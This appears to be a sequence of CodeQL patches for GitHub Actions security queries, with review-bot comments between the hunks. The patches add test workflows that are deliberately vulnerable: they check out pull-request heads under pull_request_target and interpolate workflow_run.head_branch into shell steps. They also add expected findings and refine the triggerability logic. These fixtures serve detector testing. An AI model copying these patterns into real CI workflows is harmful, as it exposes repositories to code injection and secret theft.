+ if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }}
+ runs-on: ubuntu-latest
+ needs:
+ - openapi-base
+ steps:
+ - name: Upload openapi.json (unstable) to repository server
+ uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7
+ with:
+ host: "${{ secrets.REPO_HOST }}"
+ username: "${{ secrets.REPO_USER }}"
+ key: "${{ secrets.REPO_KEY }}"
+ source: openapi-head/openapi.json
+ strip_components: 1
+ target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}"
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index 2580531afd3..eb1412bf0e2 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
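Review bot: The new fixture test21.yml carries no comment saying which property it exercises, so the intent lives only in the commit message. From the hunk, `openapi-base` checks out `github.event.pull_request.head.sha` under `pull_request_target` with `permissions: read-all` and then runs `dotnet test` on that tree, while the secrets sit in `publish-unstable`, whose `if:` excludes `pull_request_target`. A header comment such as `# Job under test: openapi-base (PR-head checkout, read-only token); secrets are only in publish-unstable, so expect CachePoisoning, not a privileged UntrustedCheckout` would let a maintainer read the matching `.expected` rows without digging through history. The same applies to the CWE-829 copy test8.yml, which is added with the same blob id `381cc16a6d1`; noting the twin file in each would help keep the two from drifting apart.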
@@ -155,6 +155,7 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | @@ -177,3 +178,4 @@ edges | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
new file mode 100644
index 00000000000..381cc16a6d1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
@@ -0,0 +1,44 @@
+name: OpenAPI
+on:
+ push:
+ branches:
+ - master
+ tags:
+ - 'v*'
+ pull_request_target:
+
+permissions: {}
+
+jobs:
+
+ openapi-base:
+ name: OpenAPI - BASE
+ if: ${{ github.base_ref != '' }}
+ runs-on: ubuntu-latest
+ permissions: read-all
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ fetch-depth: 0
+ - name: Generate openapi.json
+ run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests"
+
+ publish-unstable:
+ name: OpenAPI - Publish Unstable Spec
+ if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }}
+ runs-on: ubuntu-latest
+ needs:
+ - openapi-base
+ steps:
+ - name: Upload openapi.json (unstable) to repository server
+ uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7
+ with:
+ host: "${{ secrets.REPO_HOST }}"
+ username: "${{ secrets.REPO_USER }}"
+ key: "${{ secrets.REPO_KEY }}"
+ source: openapi-head/openapi.json
+ strip_components: 1
+ target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}"
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index f2d229e80bb..7b758b0da6d 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -325,6 +325,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e0164eafac8..05931dfe312 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -6,3 +6,4 @@ | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From f4dd771d1cc1dd791e4d74ffed89093bf5cdc455 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:18 +0200 Subject: [PATCH 0389/1267] feat(models): Add models for ssh-action --- ql/lib/ext/manual/appleboy_ssh-action.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/appleboy_ssh-action.model.yml diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml new file mode 100644 index 00000000000..c489f8edc85 --- /dev/null +++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] + - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"] + From f1d1c1e55a2c07e756dd7fa4635cc29c2a248798 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:37 +0200 Subject: [PATCH 0390/1267] Bump QL versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 554ef6bbe7f..3d20e00ddde 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.15 +version: 0.1.16 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e72b14fb358..6b41b38f9a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.15 +version: 0.1.16 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53b88627e5eb15bcee5f524fb7884321dbb77eae Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 12:15:49 +0200 Subject: [PATCH 0391/1267] feat(core): Exclude worflow_run#branches#default branch from externally triggerable events --- ql/lib/codeql/actions/Helper.qll | 8 ++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++++++- .../codeql/actions/security/CachePoisoningQuery.qll | 11 +---------- .../.github/workflows/workflow_run_branches1.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches2.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches3.yml | 12 ++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 4 ++++ .../Security/CWE-094/CodeInjectionMedium.expected | 5 +++++ 8 files changed, 68 insertions(+), 11 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 3c7091d2a85..b08b62c8a58 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +import codeql.actions.config.Config private import codeql.actions.security.ControlChecks bindingset[expr] @@ -264,3 +265,10 @@ predicate outputsPartialFileContent(string snippet) { ".*" ]) } + +string defaultBranchNames() { + repositoryDataModel(_, result) + or + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and + result = ["main", "master"] +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bb31e198cc6..e2dfd6076df 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
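Review bot: In Helper.qll the new `import codeql.actions.config.Config` is a public import placed between `private import` lines, so every module that imports Helper now also re-exports Config. Since CachePoisoningQuery.qll imports both Config and Helper explicitly in this same commit, `private import codeql.actions.config.Config` looks sufficient, unless another importer outside this diff relies on the re-export. The moved `defaultBranchNames()` also has no QLDoc; something like `/** Gets a default branch name: one configured through repositoryDataModel, or main/master when none is configured. */` would match what the body does.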
@@ -710,7 +710,18 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getName()) + // except for workflow_run which requires additional checks + externallyTriggerableEventsDataModel(this.getName()) and + not this.getName() = "workflow_run" + or + this.getName() = "workflow_run" and + // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch + // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // but in that case, the triggering workflow will run in the context of the PR head branch + ( + not exists(this.getAPropertyValue("branches")) or + not this.getAPropertyValue("branches") = defaultBranchNames() + ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 1a3e7b2b2f7..29c0ed4feed 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.config.Config +import codeql.actions.Helper string defaultBranchTriggerEvent() { result = @@ -11,16 +12,6 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = default_branch_name - ) - or - not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and - result = ["main", "master"] -} - predicate runsOnDefaultBranch(Event e) { ( e.getName() = defaultBranchTriggerEvent() and 
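Review bot: In `isExternallyTriggerable`, the condition `not this.getAPropertyValue("branches") = defaultBranchNames()` fails as soon as any one listed value equals a default branch name, so a `workflow_run` filter that mixes the default branch with other branches or patterns is treated as not externally triggerable. Assuming `getAPropertyValue` yields each list entry, the check should hold when some entry is not a default branch, e.g. `exists(string b | b = this.getAPropertyValue("branches") and not b = defaultBranchNames())`. `branches-ignore` is not considered either, and the fixtures added in this commit cover only `main` alone and no filter at all. The added comment has a typo ("if they triggering workflow") and the predicate body continues outside the hunk.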
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
new file mode 100644
index 00000000000..7920e649da8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: ["main"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
new file mode 100644
index 00000000000..601ad558fa0
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: "main"
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
new file mode 100644
index 00000000000..833d655d3e5
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
@@ -0,0 +1,12 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 6dfb91f7275..863fa67f116 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -388,3 +391,4 @@ subpaths | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 11036e7f8eb..f2fd5923034 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -325,3 +328,5 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 090b3d41d165c3d3d2d2deef8e12592515748790 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:08:54 +0200 Subject: [PATCH 0392/1267] Fix branches logic --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- .../query-tests/Security/CWE-094/CodeInjectionCritical.expected | 2 ++ .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 3 files changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e2dfd6076df..9416b39e105 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -720,7 +720,7 @@ class EventImpl extends AstNodeImpl, TEventNode { // but in that case, the triggering workflow will run in the context of the PR head branch ( not exists(this.getAPropertyValue("branches")) or - not this.getAPropertyValue("branches") = defaultBranchNames() + this.getAPropertyValue("branches").matches("%*%") ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 863fa67f116..3330ad89311 100644 
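Review bot: With the comparison replaced by `this.getAPropertyValue("branches").matches("%*%")`, a `workflow_run` restricted to a literal non-default branch name (no `*`) is now classified as not externally triggerable, exactly like one restricted to the default branch, although the comment above the condition only argues for the default-branch case. `defaultBranchNames()` is no longer consulted in this predicate at all. Checking each entry against both conditions would keep the wildcard handling and the default-branch reasoning: `exists(string b | b = this.getAPropertyValue("branches") | b.matches("%*%") or not b = defaultBranchNames())`. The expected rows for `workflow_run_branches4.yml` are added in this commit while the fixture itself only arrives in the next patch, so the tests presumably fail at this revision. The predicate body continues outside the hunk.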
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -392,3 +393,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f2fd5923034..e325205d8c8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | From 621ead2266e45d147494872f02716597c23f6d8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:09:23 +0200 Subject: [PATCH 0393/1267] Fix branches logic --- .../.github/workflows/workflow_run_branches4.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
new file mode 100644
index 00000000000..8540c3ef227
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: ["feat/**"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
From 73c77bc93bf1dd99093e229722b4a3808067a7cb Mon Sep 17 00:00:00 2001
